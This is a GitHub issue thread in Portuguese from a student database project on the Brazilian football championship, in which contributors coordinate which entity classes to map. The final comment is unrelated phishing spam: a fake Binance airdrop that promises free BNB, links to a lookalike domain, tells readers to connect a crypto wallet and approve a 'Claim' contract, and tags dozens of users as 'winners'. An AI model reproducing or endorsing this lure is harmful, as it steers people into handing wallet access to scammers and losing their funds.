### ISSUE TITLE
Classes Mapeadas

### ISSUE THREAD

**Issue by GBeckerRS** [cassiofariasmachado/banco_de_dados_II-campeonato_brasileiro#1]
Criar o mapeamento dos objetos.

**Comment by cassiofariasmachado** [comment]
As classes Jogador, Tecnico e Posicao eu já adicionei. Chegaram a dar uma olhada?

**Comment by GBeckerRS** [comment]
Sim, fiz o fork do Repositório. Vou adicionar mais algumas em breve

**Comment by GBeckerRS** [comment]
Adicionado as classes:

```
Campeonato
ClassificacaoGeral
ClubeTorcida
TorcidaOrganizada
```

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @luis-luciqm, @WendelMendes, @pctmoraes, @victorblino, @luankkobs, @DRS90, @VitorFranklinn, @Ezredem, @NathansSilva, @fberbert, @cleilsonjose, @Luana-ns, @YuriRomao2, @TiagoSAmaral, @bemibrando, @mbackermann, @ottofq, @cleogrs, @samucka98, @FabricioRocha, @RickelmeDias, @ruanclaudio, @alsantosrafael, @ellencsramos, @thiagotexdev, @lmdvlpr, @igabrielast, @WesleyOliveira01, @irisalmeida, @Perikson, @MalconSantos, @abelsouzacosta, @lfsoutello, @danilobd, @marcelohmoura, @Shudogg, @YuriCirino, @MateuxLucax, @edmuundodantez, @rafaelfl, @paulanelo, @YannMoreira, @eddardd, @notFaceroll, @joseemds, @alancjo, @carloseduardoamorim, @lucasssantos94, @weslleyrods, @edypnog
